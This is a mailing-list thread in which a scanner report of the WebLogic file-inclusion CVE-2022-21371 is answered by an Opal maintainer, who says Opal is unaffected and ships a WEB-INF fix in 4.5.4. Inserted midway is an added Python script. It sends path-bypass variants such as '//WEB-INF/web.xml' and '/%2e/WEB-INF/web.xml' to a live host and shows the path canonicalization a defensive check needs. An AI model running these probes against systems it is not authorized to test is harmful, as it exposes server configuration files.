CVE-2022-21371 - Oracle WebLogic Server Local File Inclusion


Tom Bishop

Jan 9, 2023, 10:30:30 AM
to obiba...@googlegroups.com
Hi,

One of our collaborators has raised the following issue. I guess it came from some kind of automated vulnerability scan. Does Opal use Oracle WebLogic Server and if so is it one of the reported versions below?

Thanks

Tom

Subject: CVE-2022-21371 - Oracle WebLogic Server Local File Inclusion

An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.

Steps To Reproduce:

1. Visit the URL https://<HOSTNAME>//WEB-INF/web.xml
   (or the variant https://<HOSTNAME>/.//WEB-INF/web.xml)

Impact:
Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.

Yannick Marcon

Jan 9, 2023, 12:53:20 PM
to obiba...@googlegroups.com
Hi,

Opal does not use Oracle WebLogic Server. Nevertheless, direct access to the WEB-INF directory has been fixed recently. This was a minor issue for Opal as the web.xml does not contain any sensitive information. It will be part of the next 4.5 patch release.

Regards
Yannick
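
The following is an added example, not code from the report above, from Opal or from OBiBa. It does two things a practitioner reading this thread would want: it probes a host with the request-path spellings from the reproduction steps (the `//WEB-INF/web.xml` and `/.//WEB-INF/web.xml` forms are from the report; the other variants in `PROBE_PATHS` are common equivalents assumed here), deciding exposure by whether the body contains a `<web-app` element rather than by status code alone; and it shows the canonicalization step that a fix of the kind Yannick describes needs, namely percent-decoding once and resolving `.`, `..` and repeated slashes before the "no direct access to WEB-INF or META-INF" rule is applied. The `probe`, `normalize_path`, `is_protected` and `looks_like_web_xml` names are this example's own; nothing here describes how Opal's actual fix is implemented.

```python
"""Probe for an exposed WEB-INF/web.xml via path-normalization bypasses, and
show the canonicalization a server should apply before enforcing the rule."""
import sys
import urllib.error
import urllib.request
from urllib.parse import unquote

# Request-path spellings to try. The first two come from the report in this
# thread; the rest are common equivalents added as an assumption of this example.
PROBE_PATHS = [
    "//WEB-INF/web.xml",
    "/.//WEB-INF/web.xml",
    "/WEB-INF/web.xml",
    "/./WEB-INF/web.xml",
    "/%2e/WEB-INF/web.xml",
    "/a/../WEB-INF/web.xml",
]

# Directories a servlet container must never serve as static content.
PROTECTED_DIRS = ("WEB-INF", "META-INF")


def normalize_path(raw_path: str) -> str:
    """Percent-decode once, drop empty and '.' segments and resolve '..', so that
    every equivalent spelling collapses to one canonical form (trailing slash is
    dropped, which is fine for an access check on the first segment)."""
    segments = []
    for seg in unquote(raw_path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def is_protected(raw_path: str) -> bool:
    """The access rule, applied to the canonical path rather than the raw one.
    Case-insensitive on purpose: a defensive choice for case-insensitive filesystems."""
    first_segment = normalize_path(raw_path).split("/")[1]
    return first_segment.upper() in PROTECTED_DIRS


def looks_like_web_xml(body: bytes) -> bool:
    """A served deployment descriptor carries the <web-app> root element;
    a 200 with an HTML error page or an empty body does not count as exposure."""
    return b"<web-app" in body.lower()


def probe(base_url: str, paths=PROBE_PATHS, timeout: float = 5.0):
    """Fetch each variant from a live host; returns (path, status, exposed) tuples.
    Only this function needs the network; everything above runs offline."""
    results = []
    for path in paths:
        url = base_url.rstrip("/") + path
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                status, body = resp.status, resp.read(65536)
        except urllib.error.HTTPError as err:
            status, body = err.code, b""
        except (urllib.error.URLError, OSError):
            status, body = None, b""
        results.append((path, status, status == 200 and looks_like_web_xml(body)))
    return results


# Constructed sample response used to exercise the detector without a server.
SAMPLE_WEB_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet><servlet-name>app</servlet-name></servlet>
</web-app>"""

if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Usage: python probe_webinf.py https://opal.example.org
        for path, status, exposed in probe(sys.argv[1]):
            print(f"{'EXPOSED' if exposed else 'ok':8} {str(status):5} {path}")
    else:
        for path in PROBE_PATHS:
            print(f"{path:26} -> {normalize_path(path):18} protected={is_protected(path)}")
```

Run it with a base URL to test a deployment you are authorized to assess; without arguments it just prints how each spelling canonicalizes. The point of `is_protected` is ordering: a check that compares the raw request path against `/WEB-INF/` is exactly what `//WEB-INF/` and `/.//WEB-INF/` slip past, whereas a check on the canonical form treats all of them alike. Containers decode and normalize in their own sequence, so a single decode here is an approximation; repeat the probe rather than trusting the model.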



Tom Bishop

Jan 9, 2023, 2:15:30 PM
to obiba...@googlegroups.com
Hi Yannick,

Great, thanks for clearing that up!

Tom


Yannick Marcon

Jan 10, 2023, 7:25:01 AM
to obiba...@googlegroups.com
Hi Tom,

Opal 4.5.4 has been released with the fix.

Best
Yannick


Tom Bishop

Jan 10, 2023, 8:22:41 AM
to obiba...@googlegroups.com

Thanks Yannick for this prompt fix.

Tom
